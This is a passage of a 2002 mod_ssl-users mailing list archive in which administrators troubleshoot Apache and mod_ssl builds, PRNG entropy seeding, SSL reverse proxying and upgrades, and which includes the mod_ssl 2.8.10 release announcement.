Date: Mon, 24 Jun 2002 02:27:08 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org, Alex Kotov 
Subject: Re: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, 23 Jun 2002, Alex Kotov wrote:

> After a while the server processes become stuck while waiting for
> the data from a socket.
> Running strace on a hung process produces
> read(5,
> for a long time, eventually followed by
> read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)

Are you sure that file descriptor 5 is the connection to the client?

What SSLRandomSeed are you using?  This sounds like one of those
/dev/random not-enough-entropy problems to me.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 11:02:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA06881; Mon, 24 Jun 2002 11:02:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from qmailserver.consors.es id LAA06797; Mon, 24 Jun 2002 11:00:40 +0200 (MET DST)
Received: (qmail 23296 invoked by uid 508); 24 Jun 2002 08:58:09 -0000
Received: from unknown (HELO wesami0029) (192.168.38.6)
  by 62.22.163.135 with SMTP; 24 Jun 2002 08:58:09 -0000
Message-ID: <010501c21b5d$9c6cce00$0626a8c0@consors.es>
From: "Webmaster" 
To: 
Subject: C compiler cannot create executables
Date: Mon, 24 Jun 2002 11:00:38 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0102_01C21B6E.5FE7BB50"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Webmaster" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0102_01C21B6E.5FE7BB50
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi everybody.

    Hans

    I have a problem with mod_ssl 2.8.9 for Apache 1.3.26. When I try to =
configure
this module for compilation (# configure =
--with-apache=3D/var/tmp/apache_1.3.26 ) it gives the following error:

Configuring mod_ssl/2.8.9 for Apache/1.3.26
 + Apache location: /var/tmp/apache_1.3.26 (Version 1.3.26)
 + Auxiliary patch tool: ./etc/patch/patch (local)
./configure:Error: Building of 'patch' tool failed:
-------------------------------------------------
x patch/rename.c, 1323 bytes, 3 tape blocks
x patch/util.c, 9365 bytes, 19 tape blocks
x patch/util.h, 2325 bytes, 5 tape blocks
x patch/version.c, 280 bytes, 1 tape blocks
x patch/version.h, 25 bytes, 1 tape blocks
loading cache ./config.cache
checking for gcc... gcc
checking whether the C compiler (gcc  ) works... no
configure: error: installation or configuration problem: C compiler =
cannot
create executables.
make: *** No targets.  Stop.
-------------------------------------------------
Hint: Either try to build 'patch' under etc/patch/
Hint: manually and re-run this 'configure' script
Hint: or provide us the path to your vendor 'patch'
Hint: program via the --with-patch=3DFILE option (but
Hint: expect perhaps failures when applying patches!)


My OS is Solaris 8 and I have tested it with two versions of gcc : =
9.95.2 and 3.1
I had no problems with the installation of apache 1.3.20 and mod_ssl =
2.8.4

Did anybody experienced this problem and have found a solution?

Thanks in advance.

Oscar.

------=_NextPart_000_0102_01C21B6E.5FE7BB50
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi everybody.


 


    =
Hans

    I have a=20
problem with mod_ssl 2.8.9 for Apache 1.3.26. When I try to =
configure
this=20
module for compilation (# configure =
--with-apache=3D/var/tmp/apache_1.3.26 ) it=20
gives the following error:

Configuring mod_ssl/2.8.9 for=20
Apache/1.3.26
 + Apache location: /var/tmp/apache_1.3.26 =
(Version=20
1.3.26)
 + Auxiliary patch tool: ./etc/patch/patch=20
(local)
./configure:Error: Building of 'patch' tool=20
failed:
-------------------------------------------------
x=20
patch/rename.c, 1323 bytes, 3 tape blocks
x patch/util.c, 9365 bytes, =
19 tape=20
blocks
x patch/util.h, 2325 bytes, 5 tape blocks
x =
patch/version.c, 280=20
bytes, 1 tape blocks
x patch/version.h, 25 bytes, 1 tape =
blocks
loading=20
cache ./config.cache
checking for gcc... gcc
checking whether the =
C=20
compiler (gcc  ) works... no
configure: error: installation or=20
configuration problem: C compiler cannot
create executables.
make: =
*** No=20
targets. =20
Stop.
-------------------------------------------------
Hint: =
Either try=20
to build 'patch' under etc/patch/
Hint: manually and re-run this =
'configure'=20
script
Hint: or provide us the path to your vendor 'patch'
Hint: =
program=20
via the --with-patch=3DFILE option (but
Hint: expect perhaps failures =
when=20
applying patches!)



My OS is Solaris 8 and I have tested it with two =
versions=20
of gcc : 9.95.2 and 3.1


I had no problems with the installation of =
apache 1.3.20=20
and mod_ssl 2.8.4



Did anybody experienced this problem and =
have found a=20
solution?


 


Thanks in advance.


 


Oscar.


------=_NextPart_000_0102_01C21B6E.5FE7BB50--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 11:10:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA07443; Mon, 24 Jun 2002 11:09:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA07399; Mon, 24 Jun 2002 11:08:37 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B81F64CE776; Mon, 24 Jun 2002 11:08:36 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0DB2B287D0; Mon, 24 Jun 2002 11:08:00 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from pascal.arago.de id KAA06241; Mon, 24 Jun 2002 10:52:44 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g5O8qhV13860460;
	Mon, 24 Jun 2002 10:52:43 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0nZAN; Mon Jun 24 10:52:34 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id KAA25695;
	Mon, 24 Jun 2002 10:51:36 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id KAA81458;
	Mon, 24 Jun 2002 10:52:29 +0200 (METDST)
Date: Mon, 24 Jun 2002 10:52:29 +0200
From: Thomas Binder 
To: modssl-users@modssl.org, modssl-bugdb@modssl.org
Subject: Re: [BugDB] Performance issue (PR#723)
Message-ID: <20020624105228.A2158792@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org, modssl-bugdb@modssl.org
References: <200206212349.BAA00234@opensource.ee.ethz.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200206212349.BAA00234@opensource.ee.ethz.ch>; from modssl-bugdb@modssl.org on Sat, Jun 22, 2002 at 01:49:12AM +0200
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Sat, Jun 22, 2002 at 01:49:12AM +0200, modssl-bugdb@modssl.org wrote:
> This caused a different behavior. I mean, it took a little while
> (~3 minutes), to the loadav get high, and after a few minutes,
> it got worse... the loadav reached ~60... Without the
> "no-threads no-idea -fPIC" options at the openSSL compilation,
> the high loadav is instantaneous.
> 
> I can bring any information you need to debug this problem. Just
> let me know what do you need.

What kind of random seed do you use? As far as I know, IRIX has no
/dev/random (nor /dev/urandom), so I might be a good idea to
install prngd and let SSLRandomSeed point to its socket (using
egd:/path/to/socket)

This might already solve your problem.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 12:56:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA16615; Mon, 24 Jun 2002 12:56:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA16546; Mon, 24 Jun 2002 12:54:56 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C4B584CE783; Mon, 24 Jun 2002 12:54:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C0656286B8; Mon, 24 Jun 2002 12:06:20 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from houdini.frha.continum.net id LAA08530; Mon, 24 Jun 2002 11:19:00 +0200 (MET DST)
Received: (from vtmue@localhost)
	by houdini.frha.continum.net (8.9.3/8.9.3) id LAA19060
	for modssl-users@modssl.org; Mon, 24 Jun 2002 11:19:09 +0200 (METDST)
Date: Mon, 24 Jun 2002 11:19:09 +0200
From: "V. T. Mueller" 
To: modssl-users@modssl.org
Subject: REPOST [apache 2.0.39 w/SSL on HP-UX 11.0 ignores SSLRandomSeed setting]
Message-ID: <20020624091909.GS29477@houdini.frha.continum.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.26i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "V. T. Mueller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

----- Forwarded message from "V. T. Mueller"  -----

To: modssl-users@modssl.org
Date: Fri, 21 Jun 2002 14:33:47 +0200
From: "V. T. Mueller" 
Subject: apache 2.0.39 w/SSL on HP-UX 11.0 ignores SSLRandomSeed setting
User-Agent: Mutt/1.3.26i

Hello,

A recently built 2.0.39 fails to start with:
[Fri Jun 21 12:42:47 2002] [info] Init: Initializing OpenSSL library
[Fri Jun 21 12:42:47 2002] [info] Init: Seeding PRNG with 0 bytes of entropy
[Fri Jun 21 12:42:47 2002] [warn] Init: PRNG still contains not sufficient entropy!
[Fri Jun 21 12:42:47 2002] [info] Init: Generating temporary RSA private keys (512/1024 bits)
[Fri Jun 21 12:42:47 2002] [error] Init: Failed to generate temporary 512 bit RSA private key
Configuration Failed

Tracing revealed this behaviour:
[..]
write(8, "[ F r i   J u n   2 1   1 2 : 4 ".., 77) ....... = (77)
getpid() ................................................. = 23638 (23637)
open("/dev/urandom", O_RDONLY, 0666) ..................... ERR#2 ENOENT
getuid() ................................................. = 0 (0)
time(NULL) ............................................... = 1024656167
gettimeofday(0x7f7f8c08, NULL) ........................... = 0
write(8, "[ F r i   J u n   2 1   1 2 : 4 ".., 84) ....... = 84
[..]

To my surprise, this happens with the default configuration where
SSLRandomSeed is set to "builtin" and also when I change this
particular setting to point to the existing egd socket. It also
appears when the SSL include is commented out from httpd.conf .

Is there a bug in apache or mod_ssl or am I missing something here?

System is HP-UX 11.0, my build was:
CC=cc CFLAGS='+O3 +Onolimit -Ae' ./configure --enable-ssl --with-ssl=/opt/openssl/0.9.6d --enable-so --prefix=/opt/apache2

TIA,
Volker
-----------------------------------------------------------------

Volker T. Mueller

Continum AG                                  Tel. +49 761 4794090
Boetzinger Strasse 29a                       Fax. +49 761 4794099
79111 Freiburg i. Br.                        http://continum.net
-----------------------------------------------------------------

----- End forwarded message -----
-----------------------------------------------------------------

Volker T. Mueller

Continum AG                                  Tel. +49 761 4794090
Boetzinger Strasse 29a                       Fax. +49 761 4794099
79111 Freiburg i. Br.                        http://continum.net
-----------------------------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 13:26:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA18587; Mon, 24 Jun 2002 13:25:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from visp.engelschall.com id NAA18515; Mon, 24 Jun 2002 13:24:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9ED724CE783; Mon, 24 Jun 2002 13:24:45 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 509A0286B8; Mon, 24 Jun 2002 13:24:41 +0200 (CEST)
Date: Mon, 24 Jun 2002 13:24:41 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.10
Message-ID: <20020624112441.GA58380@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Another bugfixing round in the maintainance of mod_ssl 2.8 for Apache 1.3.

Fetch it and upgrade from:

 o  http://www.modssl.org/source/
 o   ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.10 (19-Jun-2002 to 24-Jun-2002)

   *) Fixed off-by-one buffer overflow bug in the compatibility
      functionality (mapping of old directives to new ones).

   *) Fixed memory leak in processing of CA certificates.

   *) In case there is actually a certificate chain in the session cache,
      we now use the value of SSL_get_peer_certificate(ssl) to verify as
      it will have been removed from the chain before it was put in the
      cache.

   *) Seed the PRNG with a maximum of 1K from the internal scoreboard.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 13:56:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20823; Mon, 24 Jun 2002 13:55:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from slrsdc18.dmz.standardlife.com id NAA20738; Mon, 24 Jun 2002 13:54:07 +0200 (MET DST)
From: michael_pacey@standardlife.com
Received: from SLUKEM02.internal.standardlife.com (slukem02.standardlife.com [172.31.113.110])
	by slrsdc18.dmz.standardlife.com (Pro-8.9.3/Pro-8.9.3) with ESMTP id MAA26986
	for ; Mon, 24 Jun 2002 12:54:00 +0100
Received: from slukdcn4.internal.standardlife.com (slukdcn4.standardlife.com [172.31.113.107])
	by SLUKEM02.internal.standardlife.com (4.6.1.91) with ESMTP id 
	for ; Mon, 24 Jun 2002 12:45:13 +0100
Subject: Reverse proxying of SSL traffic
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.2c (Intl) 2 February 2000
Message-ID: 
Date: Mon, 24 Jun 2002 12:53:33 +0100
X-MIMETrack: Serialize by Router on SLUKDCN4/STANDARD LIFE ASSURANCE COMPANY(Release 5.0.5
 |September 22, 2000) at 24/06/2002 12:47:30
MIME-Version: 1.0 (Generated by Clearswift ES version 4.6.1.121)
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA20739
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: michael_pacey@standardlife.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi list,

I have a requirement to set up a reverse proxy (web accelerator) which will
accept incoming HTTP and HTTPS connections (using our Verisign credentials
on the proxy) and proxy those requests to other web servers.

The catch is I need the connection between the proxy and the web server to
be HTTPS if and only if the incoming connection to the proxy is HTTPS. I
will be using self-signed certificates on the web servers.

Apache+mod_ssl looks like it can do this with ProxyPass/ProxyPassReverse
but where do I reference the self signed certificate of the web server in
httpd.conf?

At the moment I get the following error in my browser when I try to use the
reverse proxy:

Proxy Error
The proxy server received an invalid response from an upstream server.


The proxy server could not handle the request GET /.


Reason: SSL proxy connect failed (slrsdct1.internal.standardlife.com:443):
peer 172.31.100.31:443: decryption failed or bad record mac


Thanks in advance.

Michael Pacey



For more information on Standard Life, visit our website
http://www.standardlife.com/

The Standard Life Assurance Company, Standard Life House, 30 Lothian Road,
Edinburgh EH1 2DH, is registered in Scotland (No. SZ4) and regulated by the
Financial Services Authority. Tel: 0131 225 2552 - calls may be recorded or
monitored. This confidential e-mail is for the addressee only. If received
in error, do not retain/copy/disclose it without our consent and please
return it to us. We virus scan and monitor all e-mails but are not
responsible for any damage caused by a virus or alteration by a third party
after it is sent.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 15:10:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA25140; Mon, 24 Jun 2002 15:04:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta07-svc.ntlworld.com id PAA25034; Mon, 24 Jun 2002 15:02:29 +0200 (MET DST)
Received: from ws ([80.6.192.198]) by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP
          id <20020624130226.QAYL19225.mta07-svc.ntlworld.com@ws>
          for ; Mon, 24 Jun 2002 14:02:26 +0100
Message-ID: <04f001c21b7e$870f6ec0$667ba8c0@ws>
From: "Zac Hillier" 
To: 
Subject: undefined symbol X509_free
Date: Mon, 24 Jun 2002 13:56:14 +0100
Organization: Net Affectors
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zac Hillier" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Have installed apache-2.0.39 with ssl module on redhat 7.3, when trying to
start the server with -D SSL I get an error:

Syntax error line 234 of httpd.conf
Cannot load mod_ssl.so into server : undefined symbol X509_free

When I build apache I used --enable-ssl=shared
and --wth-ssl=/usr/local/openssl

Can anyone suggest what I should do?

Thanks

Zac

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 15:45:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27721; Mon, 24 Jun 2002 15:43:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from executor.cambridge.redhat.com id PAA27600; Mon, 24 Jun 2002 15:41:47 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by executor.cambridge.redhat.com (Postfix) with ESMTP
	id 24DD4ABAF8; Mon, 24 Jun 2002 14:41:42 +0100 (BST)
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.11.6/8.11.0) id g5ODffR30832;
	Mon, 24 Jun 2002 14:41:41 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Mon, 24 Jun 2002 14:41:41 +0100
From: Joe Orton 
To: Karl Grindley 
Cc: modssl-users@modssl.org
Subject: Re: Apache + Modssl mod_log_config.so bug
Message-ID: <20020624144141.B28367@redhat.com>
Mail-Followup-To: Karl Grindley ,
	modssl-users@modssl.org
References: <3D1377D8.E32C474@lycos-inc.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <3D1377D8.E32C474@lycos-inc.com>; from kgrindley@lycos-inc.com on Fri, Jun 21, 2002 at 03:00:40PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Jun 21, 2002 at 03:00:40PM -0400, Karl Grindley wrote:
> 
> after upgrading to Apache 1.3.26 and ModSSL 2.8.9, the webserver seems
> to die after/during log rotation with the following errors.  It appears
> that when the logs either don't exists, or some other scenario, the
> webserver dies after receiving a -HUP or -SIGUSR1.
> 
> [Sat Jun 22 04:00:16 2002] [notice] SIGUSR1 received.  Doing graceful
> restart
> Syntax error on line 62 of /var/www/conf/httpd.conf:
> Cannot load /var/www/modules/mod_log_config.so into server:
> /var/www/modules/mod_log_config.so: undefined symbol: ap_escape_logitem
> 
> Anyone else experiencing this?  seems to even happen with standard
> RedHat apache version 1.3.22 also.

You'll get this error if you don't completely stop and start the server
after upgrading from 1.3.22 to 1.3.26. (since the 1.3.22 httpd binary is
trying to load the 1.3.26 modules after the HUP or USR1 signal, but they
aren't compatible)

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 17:10:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02887; Mon, 24 Jun 2002 17:09:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail id RAA02789; Mon, 24 Jun 2002 17:07:14 +0200 (MET DST)
Received: from [10.10.10.168] by mail
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.80 (1.8.0.0)); Mon, 24 Jun 2002 10:56:09 -0400
From: "Philip Ravenscroft" 
To: 
Subject: RE: Reverse proxying of SSL traffic
Date: Mon, 24 Jun 2002 10:56:06 -0400
Message-ID: <000801c21b8f$451802f0$a80a0a0a@projectmw.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Ravenscroft" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Set up two virtual servers for the same IP, one on port 80 (with just simple
proxy rules).  Confirm this works.

Then, set up a virtual server on port 443 with the same proxy stuff.  You
reference the certificate file there.

Phil

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of
> michael_pacey@standardlife.com
> Sent: Monday, June 24, 2002 7:54 AM
> To: modssl-users@modssl.org
> Subject: Reverse proxying of SSL traffic
>
>
> Hi list,
>
> I have a requirement to set up a reverse proxy (web
> accelerator) which will
> accept incoming HTTP and HTTPS connections (using our
> Verisign credentials
> on the proxy) and proxy those requests to other web servers.
>
> The catch is I need the connection between the proxy and the
> web server to
> be HTTPS if and only if the incoming connection to the proxy
> is HTTPS. I
> will be using self-signed certificates on the web servers.
>
> Apache+mod_ssl looks like it can do this with
> ProxyPass/ProxyPassReverse
> but where do I reference the self signed certificate of the
> web server in
> httpd.conf?
>
> At the moment I get the following error in my browser when I
> try to use the
> reverse proxy:
>
> Proxy Error
> The proxy server received an invalid response from an upstream server.
>
>
> The proxy server could not handle the request GET /.
>
>
> Reason: SSL proxy connect failed
> (slrsdct1.internal.standardlife.com:443):
> peer 172.31.100.31:443: decryption failed or bad record mac
>
>
> Thanks in advance.
>
> Michael Pacey
>
>
>
> For more information on Standard Life, visit our website
> http://www.standardlife.com/
>
> The Standard Life Assurance Company, Standard Life House, 30
> Lothian Road,
> Edinburgh EH1 2DH, is registered in Scotland (No. SZ4) and
> regulated by the
> Financial Services Authority. Tel: 0131 225 2552 - calls may
> be recorded or
> monitored. This confidential e-mail is for the addressee
> only. If received
> in error, do not retain/copy/disclose it without our consent
> and please
> return it to us. We virus scan and monitor all e-mails but are not
> responsible for any damage caused by a virus or alteration by
> a third party
> after it is sent.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 17:25:51 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03853; Mon, 24 Jun 2002 17:23:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Freedom.nexus.jhuapl.edu id RAA03765; Mon, 24 Jun 2002 17:21:13 +0200 (MET DST)
Received: by Freedom.nexus.jhuapl.edu with Internet Mail Service (5.5.2653.19)
	id ; Mon, 24 Jun 2002 11:21:00 -0400
Message-ID: 
From: "Yu, Ming" 
To: "'modssl-users@modssl.org'" 
Subject: Two copies of Apache running on the same server...
Date: Mon, 24 Jun 2002 11:20:58 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yu, Ming" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a web environment that support both http and https on the same
machine.  The machine is a powerful SParc 450 with a lot of memory and CPU
power.  I am wondering if I can install copies of apache on the same
machine, one runs http, and another runs https.  Will this improve the
server performance?

- Ming 
- System Engineer 
- APL
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 17:26:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03784; Mon, 24 Jun 2002 17:21:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from snipe.mail.pas.earthlink.net id RAA03599; Mon, 24 Jun 2002 17:18:15 +0200 (MET DST)
Received: from bigbird.mail.pas.earthlink.net ([207.217.120.244] helo=bigbird.psp.pas.earthlink.net)
	by snipe.mail.pas.earthlink.net with esmtp (Exim 3.33 #2)
	id 17MVbQ-0005JJ-00
	for modssl-users@modssl.org; Mon, 24 Jun 2002 08:18:04 -0700
Received: (from nobody@localhost)
	by bigbird.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g5OFI3u12260
	for modssl-users@modssl.org; Mon, 24 Jun 2002 08:18:04 -0700 (PDT)
Date: Mon, 24 Jun 2002 08:18:03 -0700
From: RON MCKEEVER
To: modssl-users@modssl.org
Subject: Upgrade ?
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: RON MCKEEVER
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Im a little confused on how to upgrade my current mod_ssl-2.8.7-1.3.23, to
mod_ssl-2.8.10-1.3.26. 

When I untar the new apache1.3.26 it is in it own dir.. So how do I upgrade
1.3.23? When I run the configure statement in the mod_ssl-2.8.10 dir I cant
state --with-apache="1.3.23", I need to state the new apache dir, right??

Am I missing something? If I am maybe someone can clarify the upgrade procees
to me or point me to a doc that explains this? 

To me it sounds like you have to install mod_ssl-2.8.10-1.3.26, and move all
your stuff form the old apache dir's to the new??? 

Thanks for your time up front.

ron
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 17:37:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA05123; Mon, 24 Jun 2002 17:37:03 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id RAA05079; Mon, 24 Jun 2002 17:36:12 +0200 (MET DST)
Received: from localhost (root@localhost)
